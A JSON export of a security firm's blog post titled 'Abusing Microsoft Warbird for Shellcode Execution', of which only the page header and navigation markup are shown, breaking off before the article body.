{"id":20296,"date":"2024-11-07T11:00:00","date_gmt":"2024-11-07T10:00:00","guid":{"rendered":"https:\/\/cirosec.de\/?p=20296"},"modified":"2025-12-17T12:02:04","modified_gmt":"2025-12-17T11:02:04","slug":"abusing-microsoft-warbird-for-shellcode-execution","status":"publish","type":"post","link":"https:\/\/cirosec.de\/en\/news\/abusing-microsoft-warbird-for-shellcode-execution\/","title":{"rendered":"Abusing Microsoft Warbird for Shellcode Execution"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"20296\" class=\"elementor elementor-20296\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-346a28a4 elementor-section-full_width elementor-section-content-middle elementor-section-height-default elementor-section-height-default\" data-id=\"346a28a4\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5561981d\" data-id=\"5561981d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-167be582 elementor-widget elementor-widget-template\" data-id=\"167be582\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"template.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-template\">\n\t\t\t\t\t<header data-elementor-type=\"header\" data-elementor-id=\"6422\" class=\"elementor elementor-6422 elementor-941 elementor-941\" data-elementor-post-type=\"elementor_library\">\n\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3c20b09 elementor-section-full_width elementor-section-content-middle elementor-section-height-default elementor-section-height-default\" data-id=\"3c20b09\" data-element_type=\"section\" data-e-type=\"section\" id=\"header--sticky\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;,&quot;sticky&quot;:&quot;top&quot;,&quot;sticky_on&quot;:[&quot;desktop&quot;,&quot;tablet_extra&quot;],&quot;sticky_offset&quot;:0,&quot;sticky_effects_offset&quot;:0,&quot;sticky_anchor_link_offset&quot;:0}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-2c6b6ea\" data-id=\"2c6b6ea\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-920f2b0 elementor-widget elementor-widget-theme-site-logo elementor-widget-image\" data-id=\"920f2b0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"theme-site-logo.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/en\/\">\n\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"626\" height=\"188\" src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png\" class=\"attachment-full size-full wp-image-5868\" alt=\"\" srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent.png 626w, https:\/\/cirosec.de\/wp-content\/uploads\/2023\/08\/Logo_Cirosec_rgb_53x16mm-transparent-300x90.png 300w\" sizes=\"(max-width: 626px) 100vw, 626px\" \/>\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-b85d260\" data-id=\"b85d260\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-db0098d elementor-widget__width-auto elementor-hidden-desktop elementor-widget elementor-widget-shortcode\" data-id=\"db0098d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\n<div role=\"navigation\" aria-label=\"Language Switcher\" class=\"wpml-ls-statics-shortcode_actions wpml-ls wpml-ls-legacy-dropdown-click js-wpml-ls-legacy-dropdown-click\">\n\t<ul>\n\n\t\t<li class=\" wpml-ls-item-legacy-dropdown-click\">\n\n\t\t\t<a href=\"#\" hreflang=\"\" lang=\"\" class=\"js-wpml-ls-item-toggle wpml-ls-item-toggle\" aria-expanded=\"false\" aria-controls=\"wpml-ls-submenu-click-default\" aria-haspopup=\"true\" aria-label=\"Language switcher, click to open then tab to navigate\" tabindex=\"0\" role=\"button\" title=\"\">\n\t\t\t\t<\/a>\n\n\t\t\t<ul id=\"wpml-ls-submenu-click-default\" class=\"js-wpml-ls-sub-menu wpml-ls-sub-menu\">\n\t\t\t\t\n\t\t\t\t\t<li class=\"wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-de wpml-ls-first-item wpml-ls-last-item\">\n\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/\" hreflang=\"de\" lang=\"de\" class=\"wpml-ls-link\" aria-label=\"Switch to German\" title=\"Switch to German\">\n\t\t\t\t\t\t\t                                    <img decoding=\"async\"\n            class=\"wpml-ls-flag\"\n            src=\"https:\/\/cirosec.de\/wp-content\/plugins\/sitepress-multilingual-cms\/res\/flags\/de.svg\"\n            alt=\"German\"\n            loading=\"lazy\"\n            width=15\n            height=9\n    \/><\/a>\n\t\t\t\t\t<\/li>\n\n\t\t\t\t\t\t\t<\/ul>\n\n\t\t<\/li>\n\n\t<\/ul>\n<\/div>\n<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-65a0be9 elementor-widget__width-initial elementor-widget-tablet__width-initial elementor-nav-menu--dropdown-mobile elementor-nav-menu--stretch elementor-nav-menu__align-start elementor-widget-mobile__width-auto elementor-hidden-tablet elementor-hidden-mobile elementor-hidden-tablet_extra elementor-hidden-mobile_extra elementor-widget-mobile_extra__width-initial elementor-nav-menu__text-align-aside elementor-nav-menu--toggle elementor-nav-menu--burger elementor-widget elementor-widget-nav-menu\" data-id=\"65a0be9\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;full_width&quot;:&quot;stretch&quot;,&quot;layout&quot;:&quot;horizontal&quot;,&quot;submenu_icon&quot;:{&quot;value&quot;:&quot;&lt;i class=\\&quot;fas fa-caret-down\\&quot; aria-hidden=\\&quot;true\\&quot;&gt;&lt;\\\/i&gt;&quot;,&quot;library&quot;:&quot;fa-solid&quot;},&quot;toggle&quot;:&quot;burger&quot;}\" data-widget_type=\"nav-menu.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<nav aria-label=\"Menu\" class=\"elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-horizontal e--pointer-none\">\n\t\t\t\t<ul id=\"menu-1-65a0be9\" class=\"elementor-nav-menu\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-7077\"><a href=\"https:\/\/cirosec.de\/en\/\" class=\"elementor-item\">cirosec<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-16136\"><a href=\"#\" class=\"elementor-item elementor-item-anchor\">Services<\/a>\n<ul class=\"sub-menu elementor-nav-menu--dropdown\">\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-15941\"><a href=\"https:\/\/cirosec.de\/en\/services\/\" class=\"elementor-sub-item\">Overview<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9131\"><a href=\"https:\/\/cirosec.de\/en\/services\/consulting-concepts-reviews-and-analyses\/\" class=\"elementor-sub-item\">Consulting, Concepts, Reviews and Analyses<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9073\"><a href=\"https:\/\/cirosec.de\/en\/services\/penetration-tests\/\" class=\"elementor-sub-item\">Penetration Tests<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9077\"><a href=\"https:\/\/cirosec.de\/en\/services\/red-team-assessments\/\" class=\"elementor-sub-item\">Red Team Assessments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9076\"><a href=\"https:\/\/cirosec.de\/en\/services\/incident-response-and-forensics\/\" class=\"elementor-sub-item\">Incident Response and Forensics<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9075\"><a href=\"https:\/\/cirosec.de\/en\/services\/selection-implementation-of-products-and-solutions\/\" class=\"elementor-sub-item\">Implementation of Products and Solutions<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9078\"><a href=\"https:\/\/cirosec.de\/en\/services\/it-security-training-and-awareness\/\" class=\"elementor-sub-item\">Trainings and Awareness<\/a><\/li>\n<\/ul>\n<\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-16137\"><a href=\"#\" class=\"elementor-item elementor-item-anchor\">Trainings<\/a>\n<ul class=\"sub-menu elementor-nav-menu--dropdown\">\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-15940\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/\" class=\"elementor-sub-item\">Overview<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9092\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/malware-and-ransomware-background-detection-protection-and-response\/\" class=\"elementor-sub-item\">Malware and Ransomware \u2013 Background, Detection, Protection and Response<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9095\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-microsoft-office-365\/\" class=\"elementor-sub-item\">Security in Microsoft Office 365<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9083\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-and-hardening-of-windows-operating-systems\/\" class=\"elementor-sub-item\">Hacking and Hardening of Windows Operating Systems<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9082\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-and-hardening-of-windows-infrastructures\/\" class=\"elementor-sub-item\">Hacking and Hardening of Windows Infrastructures<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9084\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme\/\" class=\"elementor-sub-item\">Hacking Extreme<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9086\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme-web-applications\/\" class=\"elementor-sub-item\">Hacking Extreme Web Applications<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9080\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/crash-course-it-and-information-security\/\" class=\"elementor-sub-item\">Crash Course IT and Information Security<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-13051\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/nis2-information-security-for-chief-executive-officers\/\" class=\"elementor-sub-item\">NIS 2 Training for Management<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9087\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/incident-handling-response\/\" class=\"elementor-sub-item\">Incident Handling &amp; Response<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-26257\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/training-in-immediate-measures\/\" class=\"elementor-sub-item\">Training in Imm\u00adediate Mea\u00adsures<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-26265\"><a href=\"https:\/\/cirosec.de\/en\/?page_id=26258\" class=\"elementor-sub-item\">Inci\u00addent Res\u00adponse Readi\u00adness Work\u00adshop<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9094\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-azure-cloud-environments\/\" class=\"elementor-sub-item\">Security in Azure Cloud Environments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9089\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/iso-27001-lead-implementer\/\" class=\"elementor-sub-item\">ISO 27001 Lead Implementer<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9088\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/iso-27001-lead-auditor\/\" class=\"elementor-sub-item\">ISO 27001 Lead Auditor<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9081\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/forensics-extreme\/\" class=\"elementor-sub-item\">Forensics Extreme<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9093\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-aws-cloud-environments\/\" class=\"elementor-sub-item\">Security in AWS Cloud Environments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9091\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/it-security-for-strategists-and-managers\/\" class=\"elementor-sub-item\">IT Security for Strategists and Managers<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9090\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/it-security-for-developers\/\" class=\"elementor-sub-item\">IT Security for Developers<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9085\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme-buffer-overflows\/\" class=\"elementor-sub-item\">Hacking Extreme Buffer Overflows<\/a><\/li>\n<\/ul>\n<\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9064\"><a href=\"https:\/\/cirosec.de\/en\/about-us\/\" class=\"elementor-item\">About us<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9160\"><a href=\"https:\/\/cirosec.de\/en\/blog\/\" class=\"elementor-item\">Blog<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t<div class=\"elementor-menu-toggle\" role=\"button\" tabindex=\"0\" aria-label=\"Menu Toggle\" aria-expanded=\"false\">\n\t\t\t<i aria-hidden=\"true\" role=\"presentation\" class=\"elementor-menu-toggle__icon--open eicon-menu-bar\"><\/i><i aria-hidden=\"true\" role=\"presentation\" class=\"elementor-menu-toggle__icon--close eicon-close\"><\/i>\t\t<\/div>\n\t\t\t\t\t<nav class=\"elementor-nav-menu--dropdown elementor-nav-menu__container\" aria-hidden=\"true\">\n\t\t\t\t<ul id=\"menu-2-65a0be9\" class=\"elementor-nav-menu\"><li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-7077\"><a href=\"https:\/\/cirosec.de\/en\/\" class=\"elementor-item\" tabindex=\"-1\">cirosec<\/a><\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-16136\"><a href=\"#\" class=\"elementor-item elementor-item-anchor\" tabindex=\"-1\">Services<\/a>\n<ul class=\"sub-menu elementor-nav-menu--dropdown\">\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-15941\"><a href=\"https:\/\/cirosec.de\/en\/services\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Overview<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9131\"><a href=\"https:\/\/cirosec.de\/en\/services\/consulting-concepts-reviews-and-analyses\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Consulting, Concepts, Reviews and Analyses<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9073\"><a href=\"https:\/\/cirosec.de\/en\/services\/penetration-tests\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Penetration Tests<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9077\"><a href=\"https:\/\/cirosec.de\/en\/services\/red-team-assessments\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Red Team Assessments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9076\"><a href=\"https:\/\/cirosec.de\/en\/services\/incident-response-and-forensics\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Incident Response and Forensics<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9075\"><a href=\"https:\/\/cirosec.de\/en\/services\/selection-implementation-of-products-and-solutions\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Implementation of Products and Solutions<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9078\"><a href=\"https:\/\/cirosec.de\/en\/services\/it-security-training-and-awareness\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Trainings and Awareness<\/a><\/li>\n<\/ul>\n<\/li>\n<li class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-16137\"><a href=\"#\" class=\"elementor-item elementor-item-anchor\" tabindex=\"-1\">Trainings<\/a>\n<ul class=\"sub-menu elementor-nav-menu--dropdown\">\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-15940\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Overview<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9092\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/malware-and-ransomware-background-detection-protection-and-response\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Malware and Ransomware \u2013 Background, Detection, Protection and Response<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9095\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-microsoft-office-365\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Security in Microsoft Office 365<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9083\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-and-hardening-of-windows-operating-systems\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Hacking and Hardening of Windows Operating Systems<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9082\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-and-hardening-of-windows-infrastructures\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Hacking and Hardening of Windows Infrastructures<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9084\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Hacking Extreme<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9086\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme-web-applications\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Hacking Extreme Web Applications<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9080\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/crash-course-it-and-information-security\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Crash Course IT and Information Security<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-13051\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/nis2-information-security-for-chief-executive-officers\/\" class=\"elementor-sub-item\" tabindex=\"-1\">NIS 2 Training for Management<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9087\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/incident-handling-response\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Incident Handling &amp; Response<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-26257\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/training-in-immediate-measures\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Training in Imm\u00adediate Mea\u00adsures<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-26265\"><a href=\"https:\/\/cirosec.de\/en\/?page_id=26258\" class=\"elementor-sub-item\" tabindex=\"-1\">Inci\u00addent Res\u00adponse Readi\u00adness Work\u00adshop<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9094\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-azure-cloud-environments\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Security in Azure Cloud Environments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9089\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/iso-27001-lead-implementer\/\" class=\"elementor-sub-item\" tabindex=\"-1\">ISO 27001 Lead Implementer<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9088\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/iso-27001-lead-auditor\/\" class=\"elementor-sub-item\" tabindex=\"-1\">ISO 27001 Lead Auditor<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9081\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/forensics-extreme\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Forensics Extreme<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9093\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/security-in-aws-cloud-environments\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Security in AWS Cloud Environments<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9091\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/it-security-for-strategists-and-managers\/\" class=\"elementor-sub-item\" tabindex=\"-1\">IT Security for Strategists and Managers<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9090\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/it-security-for-developers\/\" class=\"elementor-sub-item\" tabindex=\"-1\">IT Security for Developers<\/a><\/li>\n\t<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9085\"><a href=\"https:\/\/cirosec.de\/en\/trainings\/hacking-extreme-buffer-overflows\/\" class=\"elementor-sub-item\" tabindex=\"-1\">Hacking Extreme Buffer Overflows<\/a><\/li>\n<\/ul>\n<\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9064\"><a href=\"https:\/\/cirosec.de\/en\/about-us\/\" class=\"elementor-item\" tabindex=\"-1\">About us<\/a><\/li>\n<li class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-9160\"><a href=\"https:\/\/cirosec.de\/en\/blog\/\" class=\"elementor-item\" tabindex=\"-1\">Blog<\/a><\/li>\n<\/ul>\t\t\t<\/nav>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-9ee7d03 elementor-widget-mobile__width-auto elementor-hidden-desktop elementor-widget-tablet_extra__width-auto elementor-widget-tablet__width-auto elementor-widget-mobile_extra__width-auto elementor-view-default elementor-widget elementor-widget-icon\" data-id=\"9ee7d03\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"icon.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-icon-wrapper\">\n\t\t\t<a class=\"elementor-icon\" href=\"#elementor-action%3Aaction%3Dpopup%3Aopen%26settings%3DeyJpZCI6MTI1MDcsInRvZ2dsZSI6ZmFsc2V9\">\n\t\t\t<i aria-hidden=\"true\" class=\"fas fa-bars\"><\/i>\t\t\t<\/a>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-9aaaa68 elementor-hidden-tablet elementor-hidden-mobile elementor-hidden-tablet_extra elementor-hidden-mobile_extra\" data-id=\"9aaaa68\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-eb812f4 elementor-widget__width-auto elementor-hidden-tablet elementor-hidden-mobile elementor-widget elementor-widget-shortcode\" data-id=\"eb812f4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\n<div role=\"navigation\" aria-label=\"Language Switcher\" class=\"wpml-ls-statics-shortcode_actions wpml-ls wpml-ls-legacy-dropdown-click js-wpml-ls-legacy-dropdown-click\">\n\t<ul>\n\n\t\t<li class=\" wpml-ls-item-legacy-dropdown-click\">\n\n\t\t\t<a href=\"#\" hreflang=\"\" lang=\"\" class=\"js-wpml-ls-item-toggle wpml-ls-item-toggle\" aria-expanded=\"false\" aria-controls=\"wpml-ls-submenu-click-default\" aria-haspopup=\"true\" aria-label=\"Language switcher, click to open then tab to navigate\" tabindex=\"0\" role=\"button\" title=\"\">\n\t\t\t\t<\/a>\n\n\t\t\t<ul id=\"wpml-ls-submenu-click-default\" class=\"js-wpml-ls-sub-menu wpml-ls-sub-menu\">\n\t\t\t\t\n\t\t\t\t\t<li class=\"wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-de wpml-ls-first-item wpml-ls-last-item\">\n\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/\" hreflang=\"de\" lang=\"de\" class=\"wpml-ls-link\" aria-label=\"Switch to German\" title=\"Switch to German\">\n\t\t\t\t\t\t\t                                    <img decoding=\"async\"\n            class=\"wpml-ls-flag\"\n            src=\"https:\/\/cirosec.de\/wp-content\/plugins\/sitepress-multilingual-cms\/res\/flags\/de.svg\"\n            alt=\"German\"\n            loading=\"lazy\"\n            width=15\n            height=9\n    \/><\/a>\n\t\t\t\t\t<\/li>\n\n\t\t\t\t\t\t\t<\/ul>\n\n\t\t<\/li>\n\n\t<\/ul>\n<\/div>\n<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-d5c65bb elementor-search-form--skin-minimal elementor-widget__width-auto elementor-hidden-tablet elementor-hidden-mobile elementor-widget elementor-widget-search-form\" data-id=\"d5c65bb\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;skin&quot;:&quot;minimal&quot;}\" data-widget_type=\"search-form.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<search role=\"search\">\n\t\t\t<form class=\"elementor-search-form\" action=\"https:\/\/cirosec.de\/en\/\" method=\"get\">\n\t\t\t\t\t\t\t\t\t\t\t\t<div class=\"elementor-search-form__container\">\n\t\t\t\t\t<label class=\"elementor-screen-only\" for=\"elementor-search-form-d5c65bb\">Search<\/label>\n\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"elementor-search-form__icon\">\n\t\t\t\t\t\t\t<i aria-hidden=\"true\" class=\"fas fa-search\"><\/i>\t\t\t\t\t\t\t<span class=\"elementor-screen-only\">Search<\/span>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\n\t\t\t\t\t<input id=\"elementor-search-form-d5c65bb\" placeholder=\"Search...\" class=\"elementor-search-form__input\" type=\"search\" name=\"s\" value=\"\">\n\t\t\t\t\t<input type='hidden' name='lang' value='en' \/>\n\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t<\/form>\n\t\t<\/search>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-071bdb7 elementor-hidden-tablet elementor-hidden-mobile elementor-hidden-tablet_extra elementor-hidden-mobile_extra\" data-id=\"071bdb7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4d21fed elementor-widget elementor-widget-button\" data-id=\"4d21fed\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/cirosec.de\/en\/inquiry\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Send 